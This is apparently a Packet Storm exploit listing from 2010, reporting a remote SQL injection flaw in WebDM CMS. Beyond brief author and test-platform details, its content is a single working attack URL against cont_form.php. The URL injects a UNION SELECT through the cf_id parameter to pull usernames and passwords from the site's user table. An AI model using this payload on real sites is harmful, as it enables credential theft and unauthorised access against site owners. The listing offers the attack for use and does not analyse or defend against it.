WebDM CMS suffers from a remote SQL injection vulnerability.
21069ec0eafb5e19f8171c8a800288657d183d7c9de707d294acf9f50370a9ecIn The Name Of GOD
[+] Exploit Title: WebDM CMS SQL Injection Vulnerability
[+] Date: 2010-10-31
[+] Author : Cru3l.b0y
[+] Software Link: http://www.internetdm.co.uk/site/pages.php?fid=0,1,12
[+] Tested on: Ubuntu 10.10
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
http://target/path/cont_form.php?fid=0,325&cf_id=-1+union+select+1,2,3,concat(User,0x3a,Password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+user--
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed